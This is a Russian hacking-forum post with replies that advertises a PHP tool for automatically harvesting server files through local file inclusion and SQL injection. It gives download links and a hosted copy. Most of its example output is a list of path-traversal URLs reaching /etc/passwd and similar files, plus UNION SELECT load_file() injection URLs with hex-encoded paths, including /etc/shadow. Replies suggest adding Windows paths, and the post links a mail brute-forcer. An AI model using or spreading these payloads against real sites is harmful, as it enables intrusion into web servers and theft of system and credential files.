LogS--ToolS
 

Написал скрипт, который автоматически ищет логи, при локальном инклуде и SQL инъекции.
В файл dirs.txt записываем диры, которые надо проверить.

Download:
- [0x57656246696C652E7275]
- [0xSLIL.0xRU]

Скрипт может не работать если:
- Не выводится ошибка
- Вы неверно ввели урл

Сокеты не нужны.

Подходящий хостинг - ueuo.com

Примеры:

1. PHP-Inj:
- Пишем url: http://site.ru/include.php?file=[php]
- Результат

Цитата:

http://site.ru/include.php?file=../../../../../../../../../../../../etc/passwd http://site.ru/include.php?file=../../../../../../../../../../../../etc/hosts http://site.ru/include.php?file=../../../../../../../../../../../../etc/ftpusers http://site.ru/include.php?file=../../../../../../../../../../../../etc/syslog.conf http://site.ru/include.php?file=../../../../../../../../../../../../etc/services http://site.ru/include.php?file=../../../../../../../../../../../../etc/group http://site.ru/include.php?file=../../../../../../../../../../../../etc/bash.bashrc http://site.ru/include.php?file=../../../../../../../../../../../../etc/profile http://site.ru/include.php?file=../../../../../../../../../../../../etc/skel/.bashrc

2. SQL-Inj:
- Пишем url: http://site.ru/users.php?id=[sql]
- Колумнов: 12
- Ставим запрос на: 7
- Результат

Цитата:

http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f7 06173737764),8,9,10,11,12 http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f7 36861646f77),8,9,10,11,12 http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f6 86f737473),8,9,10,11,12 http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f7 365727669636573),8,9,10,11,12 http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f6 7726f7570),8,9,10,11,12 http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f6 e6574776f726b73),8,9,10,11,12 http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f7 0726f66696c65),8,9,10,11,12 http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f7 36b656c2f2e626173687263),8,9,10,11,12

Смотрите также
- Mail.Ru BruteForce
- Rambler.Ru

Обновил скрипт, теперь вместо [url] надо писать [php], так легче, имхо.
Исправил ошибку, когда выдавались неверные данные ну и ещё одну небольшую ошибку.
Если кому лень качать, искать хост и т.д., я залил - http://x0.6te.net/injection.php

удобный скриптик.. не нужно самому подставлять..

номер 1 не ленись составь нормальный список, на конфиги и так далее таких тулз дофига а словарей нету...

Таких тулз - 0 не считая мою, тем более на PHP. И чем тебе не нравится список логов?

неплохо было бы дефолтные виндовые пути вписать ;)

1, норм прога...вот Кеш неплохую идею подогнал!

Светлый, о каких путях на винде ты говоришь??? $systemdir ??

C:\boot.ini

Уверен?
http://forum.antichat.ru/thread45289.html

Таких тулз у меня компе минимум 6 причем есть те которые работают гараздо лучше.